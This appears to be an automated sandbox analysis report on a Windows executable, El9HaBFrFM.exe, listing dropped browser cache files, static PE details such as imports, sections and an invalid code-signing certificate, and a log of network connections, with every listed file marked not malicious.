Preview:	(function(){'use strict';function f(a,b,e){a.addEventListener&&a.addEventListener(b,e,!1)};/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .function g(a,b,e){if(Array.isArray(b))for(var c=0;c<b.length;c++)g(a,String(b[c]),e);else b!=null&&e.push(a+(b===""?"":"="+encodeURIComponent(String(b))))};function l(a=document){return a.createElement("img")};function m(a,b,e=null,c=!1){n(a,b,e,c)}function n(a,b,e,c){a.google_image_requests\|\|(a.google_image_requests=[]);const d=l(a.document);if(e\|\|c){const k=h=>{e&&e(h);if(c){h=a.google_image_requests;const v=Array.prototype.indexOf.call(h,d,void 0);v>=0&&Array.prototype.splice.call(h,v,1)}d.removeEventListener&&d.removeEventListener("load",k,!1);d.removeEventListener&&d.removeEventListener("error",k,!1)};f(d,"load",k);f(d,"error",k)}d.src=b;a.google_image_requests.push(d)};function p(a=null){return a&&a.getAttribute("data-jc")==="22"?a:document.querySelector('[data-jc="22"]')};var q=document,r=window;functi

Chrome Cache Entry: 414

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 628, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	14484
Entropy (8bit):	7.80929669604045
Encrypted:	false
SSDEEP:	192:0OVJ+JAwfhiPlzKvEirnOn894MgMilxfsrbtf+kr8U+AXY1wVkjmdXJ2sas:0+J+W+XnLellUTr88YwVkyVJcs
MD5:	BA2206CF08E7192089AE34425DA3A22A
SHA1:	474847B1ACF9A360F8F85E8A837B4AB1339C3D87
SHA-256:	491E6A0581F6604237DEB317ADAFCD5923FDAFFFC2572CD8F3DF7079BD6DF490
SHA-512:	28BD9A4737A3EF8F1DDB9ED9533D5D3BEE901CC2EEF0231D46ACD61A5B56FD16FBE954250382860701A734543F1B37E8641B49F599EBD0AAA3B4A453E4815C35
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......t.....5Ve...]PLTE....r...................kkk...BBBXXX...&&&...K.......}}}.........3~..........q.._.......... .IDATx...i..:....Gk;.....#I.,o.....O...y.........................................................................................................................................................................a.%...e.<H1.X.-.w.f..$............<H.<H1..\..vk{......T...........$...s._....z.w......w....a....7. I. .......?..../.......a..{{.$x.bN`.3.3~.]QX......(....O.Y....R..........R.y.w..Eq`].~.&. I. ....o...<..........=o#..p3}...?.W.....R.q......n>~[...<..j.p3.....w<H.<H1.....\|..z].0.........X_.\|..e2....R.......>....}e..&+.fz..o.U.....R....w....w$..7..?.R...V...../?...$............Ay...*>...J........8(..$...s..../..X_...<\`}..^.{.....R.bw.H>\|`...;....-...z....$...s i.e...,.k=[^=^`=Qcy.$x.b....ny..z.j..'...x..<'.....R.a..?....z./..}..K..x..<G.....R.A.N....Y!_.K...........i..-..n....A..A.9Ht...e..........XW......\.

Chrome Cache Entry: 415

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 628, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	8408
Entropy (8bit):	7.45689599658159
Encrypted:	false
SSDEEP:	96:MdN09f9qB+ejVmTSiMYAJLCc7466kYuZMXcOmAa4mVxrcuQPvsvtKWiqxjUBqfCz:MdWu2PMLLCX66k51qmHISVi/Bnzyvgl
MD5:	111C3C3166CD346227E1B8DF135C02B5
SHA1:	C85469F31C39294A19497B2BBC77E3828670BA47
SHA-256:	53C2BE47E0400F4B66686EF32CB9C6B726720EBD16B81B2AA1A883CC83F8C59E
SHA-512:	AEB83AC0BB3BC705C3F9E074B2253A085997D95C1530CFBF7387E07579B24A014016FD2FB8B9C63941A6B5F653A975BBA84AD4B6B50CD22E97F504618842D871
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......t.....5V*e....PLTE.w.......................................y.....M\|..........,..k.....z..(.....:.....W...{.............&........=..l...........a...........E..O.....s.....x...h..\..w................W.1.....iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x='adobe:ns:meta/'>. <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>VIEW - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2024-08-02</Attrib:Created>. <Attrib:ExtId>f2021086-289e-41ea-b556-3cdc24c81957</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchT

Chrome Cache Entry: 416

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 417

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (53532)
Category:	dropped
Size (bytes):	54834
Entropy (8bit):	5.740081137579064
Encrypted:	false
SSDEEP:	1536:jUyWUyt97qCrIvv4FMhrVXDI83LrarvpqJEgS5q:ty/7HrIuMf1eHgSE
MD5:	269A8475DF1658DAFB5E7AF2ED64D1A0
SHA1:	94BF6E3381E26A74E71107360F1B190614DB6D3E
SHA-256:	2CA3554C20669BC2CE34C005878BD96932244CABEBC3D3427066C6241C5B8C4F
SHA-512:	BE7E11FBE9211CD33D2764749A3ADF9BD98DCD8F5BE3AC91361CA110C008A81080E4D83D9BE9FAAD3DB53679A1549B44DCAD7DB721A030879547850E6E2EB32A
Malicious:	false
Reputation:	unknown
Preview:	//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function a(g){return g}var Y=function(g,K,b,w,t,M,B,N,R,E,u,Z){for(Z=(E=25,w);;)try{if(E==29)break;else if(E==K)E=l.console?0:g;else if(E==48)Z=b,N=R.createPolicy(t,{createHTML:Q,createScript:Q,createScriptURL:Q}),E=g;else if(E==18)Z=w,E=K;else if(E==0)l.console[B](u.message),E=g;else{if(E==g)return Z=w,N;if(E==84)E=R&&R.createPolicy?48:64;else if(E==25)N=M,R=l.trustedTypes,E=84;else if(E==64)return N}}catch(W){if(Z==w)throw W;Z==b&&(u=W,E=18)}},l=this\|\|self,Q=function(g){return a.call(this,g)};(0,eval)(function(g,K){return(K=Y(4,83,68,44,"bg",null,"error"))&&g.eval(K.createScript("1"))===1?function(b){return K.createScript(b)}:function(b){return""+b}}(l)(Array(Math.random()*7824\|0).join("\n")+['//# sourceMappingURL=data:application/

Chrome Cache Entry: 418

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 125 x 36, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	1443
Entropy (8bit):	7.7307811330275795
Encrypted:	false
SSDEEP:	24:ZKnbdfzwgJ+V3R1vSLy5D212jHe8zir90sNHrnC6JhGj+x79V0+LH7Uej9:ZuZbJ+VhAyB/j+9r90QLy+l0ybVh
MD5:	A41B8590BBDEDE59E04FAB9AD1934EB8
SHA1:	A688FE1849C6986344A52F1266244EE386CA009D
SHA-256:	4B74C8DE2F78D41DB98ADFD96A3EE0BCC4092018EB119952C341F820B38FB9D1
SHA-512:	92A67A772C56E3F0B838BC03B6C73C05C9E96C92E9BC64C4D1D011B2E37D961E483EAA0772CD885540C32A4A036D1AD62B30E63620A445472BD804CB8BD8B648
Malicious:	false
Reputation:	unknown
URL:	https://trksyln.net/resources/img/logo.png
Preview:	.PNG........IHDR...}...$........(....pHYs...........~.....PLTETL.]/.lC....i@.kB.lC.[,.d9.b6.^0.`3.QI.RJ.f;.TL.h=.SK.Y<....lC....qI..`...._W.......nE...........oh...........vO.......~x.XP....\|W.......{...........ZR..k..t.b5....UM.ib....lC.lC.lC.Y<.TL.GpLGpL.......CtRNS.............................................................4.....y.....1IDATX..kw.H......\X...........dv..................z.h..~..@.........?..u.:.......]A.$.a..._w..#..../cS......{..?Ho..k...l.-....+..w...v..b......g..s....k..h.](xw..R;.w....U....z.....&......T."......".....w..t.y..m...r1.M.5g.H.q..{..v..yp..L...=r.........g....UN..ty..S....'.0.C.;\|.c.R8N.#:....U50Y#..Uaq...oao...<.r?.(;.f<.K.mZv...)=..G......]:p..f;.:..V.D...&.gF..5.[....]..~.{...H.MW_...W..?.D...i.....qG.u4E..h*+J..^.C.<IXl..\|m.$.j^.xRd3.....P........(.yBR.X8.}..c.@..\!.3.S.... ..uI..<..2.Tj....E.F...W]..L...8...}..\|@'5...t..@."^3+T...q:4......P=7.N..@.(...>.^^C.3..n.G.rU..... Z.k.k.KL.....]....>hq.=..r...

Chrome Cache Entry: 419

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3580)
Category:	downloaded
Size (bytes):	16784
Entropy (8bit):	5.497019767420942
Encrypted:	false
SSDEEP:	384:LQZaeg6HPkyUQJqqz1pBjL5xz9yAFxUC8rJUrWUK2FZcSX1FsS:LQZa/6vDUQJTN35xhyAsflDUKgySlFsS
MD5:	DFDEDC6628AFFA8FAC2AA99A7F72586B
SHA1:	475F9A991D894B488CD51D62861E29197C4F8C94
SHA-256:	6A80E6F326931D8BE3BCE35187BDE97DE515207B248340C7E83EDCF4E9BA2051
SHA-512:	90B14F87535EF691199DCFDDA082A51F6B000245F7FEE20EFCEC7D42C3F267678E953C024C7A57BA90B1444B32EEB105331100D7A277496FF976FF8CF34ED4FF
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/pagead/js/r20241028/r20110914/elements/html/fullscreen_api_adapter_fy2021.js
Preview:	(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in c))break a;c=c[f]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this\|\|self;function ea(a){m.setTimeout(()=>{throw a;},0)};var p,q;a:{for(var fa=["CLOSURE_FLAGS"],r=m,t=0;t<fa.length;t++)if(r=r[fa[t]],r==null){q=null;break

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Reputation:	unknown
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.993725451245003
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	El9HaBFrFM.exe
File size:	8'278'102 bytes
MD5:	9500da3f633857c71861d6af33820c12
SHA1:	8ecddcb17a72de8cc0a4f1bea277023cfe3f32ab
SHA256:	cf691d4fccff15f697093ffc3b45d0e1c76725b701fb8f86ad39bcf444b770c6
SHA512:	05fa9202d997648fadb4ad048e79c96c8b047e07dcd1881054428b2e9db35def361ce0b266582e63a9d303a4784f64d55c68067b00474737e112e3d3cb1c8324
SSDEEP:	196608:bSHYKiwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jQ:MIHziK1piXLGVE4Ue0VJc
TLSH:	54863301A68109F6F6EBDA3DD4D28419C47236A217A1DAEF132CD27A0DB31F95836773
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..\.Z\.Z\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d..

File Icon


Icon Hash:	0c1323131d2f0e00

Static PE Info

General

Entrypoint:	0x14000cdb0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6722508C [Wed Oct 30 15:28:12 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	29/09/2021 01:00:00 29/09/2024 00:59:59
Subject Chain	CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version:	3
Thumbprint MD5:	5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1:	3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256:	60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial:	00BFB15001BBF592D4962A7797EA736FA3

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FE748F9D36Ch
dec eax
add esp, 28h
jmp 00007FE748F9CF8Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007FE748F9D738h
test eax, eax
je 00007FE748F9D133h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007FE748F9D117h
dec eax
cmp ecx, eax
je 00007FE748F9D126h
xor eax, eax
dec eax
cmpxchg dword ptr [0003577Ch], ecx
jne 00007FE748F9D100h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007FE748F9D109h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007FE748F9D119h
mov byte ptr [00035765h], 00000001h
call 00007FE748F9C865h
call 00007FE748F9DB50h
test al, al
jne 00007FE748F9D116h
xor al, al
jmp 00007FE748F9D126h
call 00007FE748FAA66Fh
test al, al
jne 00007FE748F9D11Bh
xor ecx, ecx
call 00007FE748F9DB60h
jmp 00007FE748F9D0FCh
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0003572Ch], 00000000h
mov ebx, ecx
jne 00007FE748F9D179h
cmp ecx, 01h
jnbe 00007FE748F9D17Ch
call 00007FE748F9D6AEh
test eax, eax
je 00007FE748F9D13Ah
test ebx, ebx
jne 00007FE748F9D136h
dec eax
lea ecx, dword ptr [00035716h]
call 00007FE748FAA462h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca5c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x8408	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2250	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x7e2c0e	0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x50000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f00	0x2a000	2a7ae207b6295492e9da088072661752	False	0.5514439174107143	data	6.487454925709845	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a50	0x12c00	17bdc256292477149c81bec0d706678c	False	0.5244791666666667	data	5.752654841959546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2250	0x2400	f5559f14427a02f0a5dbd0dd026cae54	False	0.470703125	data	5.291665041994019	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x8408	0x8600	515874a0990ae218e4bbca91ff9bf425	False	0.9068913246268657	data	7.875595982945999	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x50000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x47250	0x192	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	1.027363184079602
RT_ICON	0x473e4	0x281	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	1.0171606864274572
RT_ICON	0x47668	0x391	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	1.0120481927710843
RT_ICON	0x479fc	0x62f	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	1.0069488313329122
RT_ICON	0x4802c	0x987	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	1.002870028700287
RT_ICON	0x489b4	0x1a06	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	0.9707295106574603
RT_ICON	0x4a3bc	0x4706	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9569354306456935
RT_GROUP_ICON	0x4eac4	0x68	data	0.7115384615384616
RT_VERSION	0x4eb2c	0x3cc	data	0.4382716049382716
RT_MANIFEST	0x4eef8	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 19:19:17.694618940 CET	49737	80	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:17.695514917 CET	49738	80	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:17.699734926 CET	80	49737	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:17.699804068 CET	49737	80	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:17.700411081 CET	80	49738	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:17.700473070 CET	49738	80	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:17.909230947 CET	49738	80	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:17.914231062 CET	80	49738	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:18.540455103 CET	80	49738	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:18.716296911 CET	49741	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:18.716331959 CET	443	49741	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:18.716398954 CET	49741	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:18.716593027 CET	49741	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:18.716604948 CET	443	49741	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:18.749731064 CET	49738	80	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:18.750243902 CET	80	49738	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:18.750329018 CET	49738	80	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:19.821947098 CET	443	49741	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:19.866102934 CET	49741	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:19.878721952 CET	49741	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:19.878730059 CET	443	49741	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:19.879798889 CET	443	49741	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:19.879864931 CET	49741	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:19.891510010 CET	49741	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:19.891583920 CET	443	49741	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:19.891702890 CET	49741	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:19.891710043 CET	443	49741	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:20.007121086 CET	49741	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:20.475735903 CET	443	49741	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:20.476463079 CET	443	49741	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:20.476526022 CET	49741	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:20.507060051 CET	49741	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:20.507102013 CET	443	49741	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:20.776849031 CET	49742	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:20.776890039 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:20.776948929 CET	49742	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:20.777540922 CET	49742	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:20.777555943 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:20.793291092 CET	49744	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:20.793335915 CET	443	49744	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:20.793407917 CET	49744	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:20.793657064 CET	49744	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:20.793684006 CET	443	49744	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.669298887 CET	443	49744	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.669301033 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.669631004 CET	49744	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:21.669660091 CET	443	49744	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.669769049 CET	49742	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:21.669802904 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.670032978 CET	443	49744	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.670157909 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.671816111 CET	49742	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:21.671892881 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.672161102 CET	49744	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:21.672231913 CET	443	49744	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.672734022 CET	49742	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:21.672954082 CET	49744	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:21.715333939 CET	443	49742	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.715343952 CET	443	49744	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:21.743529081 CET	49747	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:19:21.743580103 CET	443	49747	142.250.185.228	192.168.2.4
Oct 31, 2024 19:19:21.743818998 CET	49747	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:19:21.744543076 CET	49747	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:19:21.744561911 CET	443	49747	142.250.185.228	192.168.2.4
